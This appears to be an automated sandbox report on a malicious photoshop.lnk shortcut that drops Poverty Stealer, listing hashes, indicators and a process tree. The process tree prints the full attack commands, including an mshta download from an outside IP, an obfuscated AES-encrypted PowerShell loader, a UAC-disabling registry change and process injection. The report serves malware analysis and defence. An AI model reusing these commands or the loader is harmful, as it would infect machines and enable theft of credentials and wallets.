Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
04-03-2024 17:44
Static task
static1
Behavioral task
behavioral1
Sample
photoshop.lnk
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
photoshop.lnk
Resource
win10v2004-20240226-en
General
-
Target
photoshop.lnk
-
Size
1KB
-
MD5
53388b72e46cbc4a0110d3b6d0c0f930
-
SHA1
46881d02e2249c29ff212eb0bf15ce07828ae519
-
SHA256
05ef3c21d0ec7a856038e43c38032104948a535078649721b790548bf3260e28
-
SHA512
00646615c24cf58f28dfbd6a373f981f85738ec35ca91ef4816198fbc80573ce249083c7df60fdd0a63b42fa1e8011901555be8f5b8181490f2d767a085dc885
Malware Config
Extracted
http://91.92.251.35/Downloads/Ten/photoshop
Signatures
-
Detect Poverty Stealer Payload 4 IoCs
resource yara_rule behavioral2/memory/4496-129-0x0000000000160000-0x000000000016A000-memory.dmp family_povertystealer behavioral2/memory/4496-135-0x0000000000160000-0x000000000016A000-memory.dmp family_povertystealer behavioral2/memory/4496-136-0x0000000000160000-0x000000000016A000-memory.dmp family_povertystealer behavioral2/memory/4496-137-0x0000000000160000-0x000000000016A000-memory.dmp family_povertystealer -
Poverty Stealer
Poverty Stealer is a crypto and infostealer written in C++.
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" powershell.exe -
Blocklisted process makes network request 2 IoCs
flow pid Process 9 3668 mshta.exe 26 1344 powershell.exe -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000\Control Panel\International\Geo\Nation Photoshop.exe -
Executes dropped EXE 8 IoCs
pid Process 4108 Photoshop.exe 216 7z.exe 4428 7z.exe 1680 7z.exe 2904 7z.exe 4820 7z.exe 3220 7z.exe 3152 nmYIeCI7gcMH.exe -
Loads dropped DLL 6 IoCs
pid Process 216 7z.exe 4428 7z.exe 1680 7z.exe 2904 7z.exe 4820 7z.exe 3220 7z.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 3152 set thread context of 4496 3152 nmYIeCI7gcMH.exe 118 -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\Vss\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 1300 powershell.exe 1300 powershell.exe 4796 powershell.exe 4796 powershell.exe 1344 powershell.exe 1344 powershell.exe -
Suspicious use of AdjustPrivilegeToken 27 IoCs
description pid Process Token: SeDebugPrivilege 1300 powershell.exe Token: SeDebugPrivilege 4796 powershell.exe Token: SeDebugPrivilege 1344 powershell.exe Token: SeRestorePrivilege 216 7z.exe Token: 35 216 7z.exe Token: SeSecurityPrivilege 216 7z.exe Token: SeSecurityPrivilege 216 7z.exe Token: SeRestorePrivilege 4428 7z.exe Token: 35 4428 7z.exe Token: SeSecurityPrivilege 4428 7z.exe Token: SeSecurityPrivilege 4428 7z.exe Token: SeRestorePrivilege 1680 7z.exe Token: 35 1680 7z.exe Token: SeSecurityPrivilege 1680 7z.exe Token: SeSecurityPrivilege 1680 7z.exe Token: SeRestorePrivilege 2904 7z.exe Token: 35 2904 7z.exe Token: SeSecurityPrivilege 2904 7z.exe Token: SeSecurityPrivilege 2904 7z.exe Token: SeRestorePrivilege 4820 7z.exe Token: 35 4820 7z.exe Token: SeSecurityPrivilege 4820 7z.exe Token: SeSecurityPrivilege 4820 7z.exe Token: SeRestorePrivilege 3220 7z.exe Token: 35 3220 7z.exe Token: SeSecurityPrivilege 3220 7z.exe Token: SeSecurityPrivilege 3220 7z.exe -
Suspicious use of WriteProcessMemory 39 IoCs
description pid Process procid_target PID 848 wrote to memory of 1180 848 cmd.exe 91 PID 848 wrote to memory of 1180 848 cmd.exe 91 PID 1180 wrote to memory of 1300 1180 forfiles.exe 92 PID 1180 wrote to memory of 1300 1180 forfiles.exe 92 PID 1300 wrote to memory of 3668 1300 powershell.exe 93 PID 1300 wrote to memory of 3668 1300 powershell.exe 93 PID 3668 wrote to memory of 4796 3668 mshta.exe 97 PID 3668 wrote to memory of 4796 3668 mshta.exe 97 PID 4796 wrote to memory of 1344 4796 powershell.exe 99 PID 4796 wrote to memory of 1344 4796 powershell.exe 99 PID 1344 wrote to memory of 4108 1344 powershell.exe 102 PID 1344 wrote to memory of 4108 1344 powershell.exe 102 PID 1344 wrote to memory of 4108 1344 powershell.exe 102 PID 4108 wrote to memory of 2364 4108 Photoshop.exe 103 PID 4108 wrote to memory of 2364 4108 Photoshop.exe 103 PID 2364 wrote to memory of 960 2364 cmd.exe 105 PID 2364 wrote to memory of 960 2364 cmd.exe 105 PID 2364 wrote to memory of 216 2364 cmd.exe 106 PID 2364 wrote to memory of 216 2364 cmd.exe 106 PID 2364 wrote to memory of 4428 2364 cmd.exe 107 PID 2364 wrote to memory of 4428 2364 cmd.exe 107 PID 2364 wrote to memory of 1680 2364 cmd.exe 108 PID 2364 wrote to memory of 1680 2364 cmd.exe 108 PID 2364 wrote to memory of 2904 2364 cmd.exe 109 PID 2364 wrote to memory of 2904 2364 cmd.exe 109 PID 2364 wrote to memory of 4820 2364 cmd.exe 110 PID 2364 wrote to memory of 4820 2364 cmd.exe 110 PID 2364 wrote to memory of 3220 2364 cmd.exe 111 PID 2364 wrote to memory of 3220 2364 cmd.exe 111 PID 2364 wrote to memory of 2164 2364 cmd.exe 112 PID 2364 wrote to memory of 2164 2364 cmd.exe 112 PID 2364 wrote to memory of 3152 2364 cmd.exe 113 PID 2364 wrote to memory of 3152 2364 cmd.exe 113 PID 2364 wrote to memory of 3152 2364 cmd.exe 113 PID 3152 wrote to memory of 4496 3152 nmYIeCI7gcMH.exe 118 PID 3152 wrote to memory of 4496 3152 nmYIeCI7gcMH.exe 118 PID 3152 wrote to memory of 4496 3152 nmYIeCI7gcMH.exe 118 PID 3152 wrote to memory of 4496 3152 nmYIeCI7gcMH.exe 118 PID 3152 wrote to memory of 4496 3152 nmYIeCI7gcMH.exe 118 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 2164 attrib.exe
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\photoshop.lnk1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:848 -
C:\Windows\System32\forfiles.exe"C:\Windows\System32\forfiles.exe" /p C:\Windows\Vss /c "powershell start mshta http://91.92.251.35/Downloads/Ten/photoshop2⤵
- Suspicious use of WriteProcessMemory
PID:1180 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exestart mshta http://91.92.251.35/Downloads/Ten/photoshop3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1300 -
C:\Windows\system32\mshta.exe"C:\Windows\system32\mshta.exe" http://91.92.251.35/Downloads/Ten/photoshop4⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3668 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ivXRRY = 'AAAAAAAAAAAAAAAAAAAAAHuMmso1AMeYPTqg2zmFYGLRAevBF0dzIBqwjcA2oQ2m8+KngkChOWPmpzxbUmz9iES2+wmHBDF4NNikX/9SA+8RZl3cvQDF00jQ0YmFtDKSgyA9b4/phWWKAp1Dd8/ytR6dOWK+gl5jA/RW80HrzF8zwxTzeNjzEdYIbAKbgIvUzpdq1PfpNgSDcrLwnf6wYoWXaDo+4f2SPpaJvd5bWGTy1EJj8FAnhAlSK/pbposi/hrdUPIRQvxHXKQQXZlr5NrPpLbhHHu78ydc6wwTCvZk77DaGi39y5qB230ZYk/e7tV27V3q01tqCxdx3tBcSKA7uAMyX8Ey/mjlsAOXbJ57iEolFiQtMkeLXRQnHlGQAom0cfG+TD7Cm01qvC5pMEeNJbLbciSdu9xs9T+c7tPx+xBYuPOvZFzYMN57JaeaZXehvSTkRY2hC6KnLkyRSwtTIKg1U8Ib7rr08szQWfdMaxRKVj3PGI/wQuxJ+WJA8tcTFqvoG6e88+mNmfdwt98gTMZWjCMtvnf4CBc92ueyM5vs56/2u+UVEJzepZUpK8lTTQTWjY1hlOFe0emGmyht+KS1zFSwWZBbRyNt0o5Dy9xG4GYyKw+ZUF5kF4SxYX6Yv7NLLkRJ1zA1vynUhhQD0GSeGUgNQ+quSJnyFSiEdpEa8NFWaep0COP5xyMiCOqi/EypECYLwCKEOwNqBqZ0/BjRXs3On8DJzDn994w83i+XNhIcnKswDJ1rV9Alxlwmt19nbz+Dn58l/ZcLWwvS6I+mTp8UBEk0CSxgzPNb8mX3rVtEvxZVuhLJa7/XWLcWSIGEtaXWpgRM/SbMXkdj7MO7V+BRMP1qf/dcU/TUhY1lotTnnHCHRFeLb1d1';$ftUus = 'ckRTZUh1VlFmVnlTa2luUmVGS3hIRGlVRktJVGF1aEI=';$qOFHjUF = New-Object 'System.Security.Cryptography.AesManaged';$qOFHjUF.Mode = [System.Security.Cryptography.CipherMode]::ECB;$qOFHjUF.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$qOFHjUF.BlockSize = 128;$qOFHjUF.KeySize = 256;$qOFHjUF.Key = [System.Convert]::FromBase64String($ftUus);$svgDF = [System.Convert]::FromBase64String($ivXRRY);$JuzxcfzI = $svgDF[0..15];$qOFHjUF.IV = $JuzxcfzI;$ceTYAICRx = $qOFHjUF.CreateDecryptor();$SsqoZtLKt = $ceTYAICRx.TransformFinalBlock($svgDF, 16, $svgDF.Length - 16);$qOFHjUF.Dispose();$JFlSsSI = New-Object System.IO.MemoryStream( , $SsqoZtLKt );$wBZvtko = New-Object System.IO.MemoryStream;$pFgGcVXpX = New-Object System.IO.Compression.GzipStream $JFlSsSI, ([IO.Compression.CompressionMode]::Decompress);$pFgGcVXpX.CopyTo( $wBZvtko );$pFgGcVXpX.Close();$JFlSsSI.Close();[byte[]] $xIpqeQj = $wBZvtko.ToArray();$BomjpubV = [System.Text.Encoding]::UTF8.GetString($xIpqeQj);$BomjpubV | powershell -5⤵
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4796 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -6⤵
- UAC bypass
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1344 -
C:\Users\Admin\AppData\Roaming\Photoshop.exe"C:\Users\Admin\AppData\Roaming\Photoshop.exe"7⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4108 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"8⤵
- Suspicious use of WriteProcessMemory
PID:2364 -
C:\Windows\system32\mode.commode 65,109⤵PID:960
-
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e file.zip -p125762329330388294023250819845 -oextracted9⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:216
-
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_5.zip -oextracted9⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:4428
-
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_4.zip -oextracted9⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:1680
-
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_3.zip -oextracted9⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:2904
-
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_2.zip -oextracted9⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:4820
-
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_1.zip -oextracted9⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:3220
-
-
C:\Windows\system32\attrib.exeattrib +H "nmYIeCI7gcMH.exe"9⤵
- Views/modifies file attributes
PID:2164
-
-
C:\Users\Admin\AppData\Local\Temp\main\nmYIeCI7gcMH.exe"nmYIeCI7gcMH.exe"9⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3152 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"10⤵PID:4496
-
-
-
-
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
64B
MD5d8b9a260789a22d72263ef3bb119108c
SHA1376a9bd48726f422679f2cd65003442c0b6f6dd5
SHA256d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc
SHA512550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b
-
Filesize
1.6MB
MD572491c7b87a7c2dd350b727444f13bb4
SHA11e9338d56db7ded386878eab7bb44b8934ab1bc7
SHA25634ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891
SHA512583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511
-
Filesize
458KB
MD5619f7135621b50fd1900ff24aade1524
SHA16c7ea8bbd435163ae3945cbef30ef6b9872a4591
SHA256344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2
SHA5122c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628
-
Filesize
2.2MB
MD547e8ed572da00474326b4cee8f85b005
SHA194bceabdc880c41d73d6c984a9d61c31dd29ce91
SHA256abd52eb132c8c23669233a656f036a0e07692efd398894b724b61b66a75564af
SHA51231da04b57f0ef1b3363a3fa4855ca576d9159d374de0d2d9defb5524e67fed740441dcc2245a246daecab6260a419c02a32770ee9be53a2ddbede9dd4848d624
-
Filesize
509KB
MD55f79b89dbaf23387caa818b0da7b8ea2
SHA13c38d94819331fd551c07048841cfe6ecbf29e18
SHA2567abc58d9dd3dee48f88629c8dcaf12e72a337f8bf1dbce59d464ab6ed698b726
SHA512a6381f3b0d3184ab098e9a40ca65dd1cec76cb7e0cfe13a5c2d188e4c8e6d077286c70a366ad6ffc7e7f68faa6240a730b7034fcaa00d1c1f0922e42c1edb8fc
-
Filesize
509KB
MD5763cb011f068f184a672e254d3ce3c39
SHA159eb148e6ad321cac5396e6a58c1528f7932befb
SHA256d25782f4a9573c40747458b6916e9332b34a349b3011ec85dd5d11a583a87105
SHA512530b8c0ad90b53f38cd56ffaf3766f33167c9922e55f8485ca87019275730c94dd6a84a1d9578163c45bae2743cf6981041f9ccc97ceb822f8d607f94a0c1d28
-
Filesize
509KB
MD5210ee7f34c0ff268d33d598a49eb889a
SHA1876dea438f3f365513159630a12a2192fecd8b7f
SHA2569d8ee7edf36676633d624774cb194a45ef8ae286cb5e9591d46c20be57a9282f
SHA512383bb66f996b858d4ef23eed2264c4f890d47aca7b3da88587e3bb6454183f8d35e44411b08eecafe3fbb0638610cd872d1d00402dd8ff0b660102a44b53bcb1
-
Filesize
509KB
MD54ab6b1ed8f26df37c531a80147982511
SHA125d59710197c30eee836096dfcce139ba84f978a
SHA25633f73488015443cc05fa02d1c0723921502de5cac3206cf9fc433472a2afb162
SHA512a582e4cd93baf45b48aad086ffc5edab4ec899cbd029e9e740e93cf34a2aff492f14c92ed2efc0339fc4eed979311600007fca3075abda28232d9d351dd49e24
-
Filesize
2.1MB
MD59e57c6bb6dfb456cd9907844b7afafbd
SHA1daee76439ed4cd77192dc5c2d52b187f18e5ba99
SHA256729dbb0bd855dc1c1cf59366f49e29cb2b6e0d1279270924d2b131d7df749eab
SHA5123a99dae0a7c4ac47c5143dd6ada9a485cf115d3d9b172c3ba6d0847d6848e41defccd3a4eaf1b44c3ae46820c2164127b4e1ceaa5e07a8028e9b38f823a5960b
-
Filesize
619KB
MD553c6cf5bf9ce4922b3dc9bf9cc2374a2
SHA1b9a0d229a47fadaaa0898d32dce3aac279ac8569
SHA2562bb1a0a95249e3bcca1fdfc740bc91df10dc9c8cd834707a0b5a31883eb6867e
SHA512d323cfdfc3db5c5ce70ba572c0c657def11c3b36703a029977f5c5ddfdb278dfd1eea8950686d7a566dcd550aa0c854ceb035e6e67fcb377a8fc50dc4e0cd64c
-
Filesize
2.1MB
MD5afaebf70e6daf7bf2e07cd11f93ee4a1
SHA14e8b08b3e50f860955bd00d16fc1653c07b7c608
SHA2564a9d76fb9d77efaf81616e750b928ba3955599acafb2c0fec0d7ce412db0f47b
SHA5124db3a63f03f8816b85fdb905e2a2f08967f9f3735206f08f2cae8b8cd561e8563d2f92c188d32b94fdb6d472e07c5f41f54e26673f8a81449454225220ba397f
-
Filesize
491B
MD512b875e85a885c81bc04161e9df9151a
SHA17d9e32a575e487611abb182b4d89b1ab4f4e7a06
SHA25697e80e083ba83a031bb03097cd81d86708165cd7eb1c070782e6a7234de784a5
SHA5123ba38a4024287bcaeee208a1c0158fae73a86d5581cf566309985bbd204e810eb5fd099a1816a9326c9e25bb08a2da20f2a4884978eb4e4ed8a3762c1057d0ca
-
Filesize
2.2MB
MD58e226f7bc83ade32a4c39fdde45b815c
SHA1198a4a9ca47eac8ac08501287c3a950206183fc2
SHA256be7d057cd4a046d6c757f4c72a2457496dacde193394dc9d84c6f9b2ff11af32
SHA512dded955bf387102cef9998d5fc2ca548c414555ce677d81013ee9e9591a62191b7190dcf1f081ca7c7bca90d36037800b0e6379069294f43eb1c626e272332eb
-
Filesize
640KB
MD579851029bfda0d50d9e1f24602a7f56e
SHA151619ce355236c248cacef8c41fd305871067903
SHA256919dba5dd119272c034abab608286c54cd15cf86540d18f418e144972bd3acc9
SHA512ce17defa6554d6634c5b07758a753baae4c2dee55b168fa2ac5bb5e820b264be54584fdc972291817e455f2c3bda18f3eb2e0908db092485bb78e88b73bb5a0c
-
Filesize
466KB
MD5158612e8d70c41c7e577d6635fe7db84
SHA11cd024fe5e63055e07270f309d3a091913f9c516
SHA256e2b0351022ec23b7c9204cf1f3b23fc98d5e7ee180ceb6f4fb7512eaf3594ecd
SHA5128c03cd134d0a5efeae615fac59ee8af3f9f19cc397cd75cf741c1ce3f21dd6d536ff455ed94cb263464491dc112cd2355537682a0b3275b40268b1fc1459e1ce